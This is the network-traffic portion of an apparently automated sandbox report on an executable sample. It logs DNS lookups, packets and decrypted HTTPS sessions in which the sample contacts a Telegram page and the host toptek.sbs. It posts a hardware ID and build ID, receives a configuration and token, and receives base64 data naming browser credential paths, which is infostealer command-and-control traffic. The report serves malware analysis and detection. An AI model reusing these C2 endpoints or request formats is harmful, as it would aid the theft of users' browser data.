                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.099816084 CET44351736162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.116054058 CET44351736162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.145251036 CET51736443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.240044117 CET44351736162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.241275072 CET44351736162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.256951094 CET44351736162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258021116 CET44351736162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258214951 CET51736443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.568569899 CET6268553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.568811893 CET6228553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.705984116 CET53626851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.706583977 CET53622851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.707468987 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.707623959 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.707900047 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.708163023 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:20.791830063 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:20.793729067 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:20.825665951 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.109625101 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.109646082 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.109657049 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.109667063 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.132004023 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.132158041 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.272859097 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.272859097 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.273324013 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.273339033 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.445692062 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.446063995 CET50348443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.587079048 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.587337017 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.587683916 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:21.768105030 CET44350348172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:22.164860964 CET44350348172.64.41.3192.168.2.5

                                                                                                                                                                                                                                                                                    ICMP Packets

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:51.232611895 CET192.168.2.51.1.1.1c29b(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:15.500107050 CET192.168.2.51.1.1.10x8853Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.704885006 CET192.168.2.51.1.1.10xd576Standard query (0)toptek.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.821027040 CET192.168.2.51.1.1.10xa924Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.821177006 CET192.168.2.51.1.1.10x3ce5Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:49.298034906 CET192.168.2.51.1.1.10x7f5aStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:49.298579931 CET192.168.2.51.1.1.10x5750Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:51.765254974 CET192.168.2.51.1.1.10x4173Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:51.765458107 CET192.168.2.51.1.1.10x8224Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:52.599596024 CET192.168.2.51.1.1.10x56cdStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:52.599853039 CET192.168.2.51.1.1.10x25a9Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.695800066 CET192.168.2.51.1.1.10xcdceStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.697206020 CET192.168.2.51.1.1.10xe3ffStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.704097986 CET192.168.2.51.1.1.10xa880Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.704576015 CET192.168.2.51.1.1.10x9367Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.763902903 CET192.168.2.51.1.1.10xc882Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.764364958 CET192.168.2.51.1.1.10x31feStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.449621916 CET192.168.2.51.1.1.10x677bStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.449738979 CET192.168.2.51.1.1.10x350fStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.464361906 CET192.168.2.51.1.1.10x66b7Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.464550972 CET192.168.2.51.1.1.10xab20Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.588921070 CET192.168.2.51.1.1.10xc937Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.589066982 CET192.168.2.51.1.1.10x9fd7Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.731015921 CET192.168.2.51.1.1.10xdd8dStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.731249094 CET192.168.2.51.1.1.10xa12Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.568569899 CET192.168.2.51.1.1.10x702dStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.568811893 CET192.168.2.51.1.1.10x5bdStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:15.641165972 CET1.1.1.1192.168.2.50x8853No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.933862925 CET1.1.1.1192.168.2.50xd576No error (0)toptek.sbs94.130.188.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.957706928 CET1.1.1.1192.168.2.50xa924No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.959024906 CET1.1.1.1192.168.2.50x3ce5No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:49.434943914 CET1.1.1.1192.168.2.50x7f5aNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:49.435751915 CET1.1.1.1192.168.2.50x5750No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:49.956629038 CET1.1.1.1192.168.2.50xd8e5No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:49.956629038 CET1.1.1.1192.168.2.50xd8e5No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:50.038609982 CET1.1.1.1192.168.2.50xbcadNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:51.902947903 CET1.1.1.1192.168.2.50x4173No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:51.903953075 CET1.1.1.1192.168.2.50x8224No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:52.839467049 CET1.1.1.1192.168.2.50x56cdNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:52.839467049 CET1.1.1.1192.168.2.50x56cdNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:52.840306044 CET1.1.1.1192.168.2.50x25a9No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.832571030 CET1.1.1.1192.168.2.50xcdceNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.832571030 CET1.1.1.1192.168.2.50xcdceNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.834531069 CET1.1.1.1192.168.2.50xe3ffNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.840867043 CET1.1.1.1192.168.2.50xa880No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.840867043 CET1.1.1.1192.168.2.50xa880No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.841548920 CET1.1.1.1192.168.2.50x9367No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.901259899 CET1.1.1.1192.168.2.50x31feNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.901654959 CET1.1.1.1192.168.2.50xc882No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.901654959 CET1.1.1.1192.168.2.50xc882No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.586496115 CET1.1.1.1192.168.2.50x677bNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.586496115 CET1.1.1.1192.168.2.50x677bNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.586496115 CET1.1.1.1192.168.2.50x677bNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.586496115 CET1.1.1.1192.168.2.50x677bNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.601387978 CET1.1.1.1192.168.2.50xab20No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.601830006 CET1.1.1.1192.168.2.50x66b7No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.725667953 CET1.1.1.1192.168.2.50x9fd7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.727541924 CET1.1.1.1192.168.2.50xc937No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.868402958 CET1.1.1.1192.168.2.50xdd8dNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.869535923 CET1.1.1.1192.168.2.50xa12No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.705984116 CET1.1.1.1192.168.2.50x702dNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.705984116 CET1.1.1.1192.168.2.50x702dNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.706583977 CET1.1.1.1192.168.2.50x5bdNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                                                                                                    • toptek.sbs
                                                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                                                    • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    • https:
                                                                                                                                                                                                                                                                                      • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                      • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      • c.msn.com

                                                                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.549704149.154.167.994435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:17 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:17 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:17 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                    Content-Length: 12296
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: stel_ssid=63c66010c79cf1f234_16855964949177906532; expires=Tue, 24 Dec 2024 05:57:17 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:17 UTC12296INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.54970594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:19 UTC230OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    2192.168.2.54970694.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:21 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 256
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:21 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 37 31 34 38 37 41 35 35 45 44 31 32 35 33 31 33 31 38 31 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 2d 2d 0d
                                                                                                                                                                                                                                                                                    Data Ascii: ------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="hwid"7971487A55ED1253131813-a33c7340-61ca------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------PHLFC2NGVAAIEUSR9RI5--
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:22 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:22 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|56d79d211678d143c3e6bd8262e8a87a|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    3192.168.2.54970794.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:24 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----YCT0HVAS26FUAI5PZ5X4
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 59 43 54 30 48 56 41 53 32 36 46 55 41 49 35 50 5a 35 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 59 43 54 30 48 56 41 53 32 36 46 55 41 49 35 50 5a 35 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 59 43 54 30 48 56 41 53 32 36 46 55 41 49 35 50 5a 35 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------YCT0HVAS26FUAI5PZ5X4Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:25 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:25 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
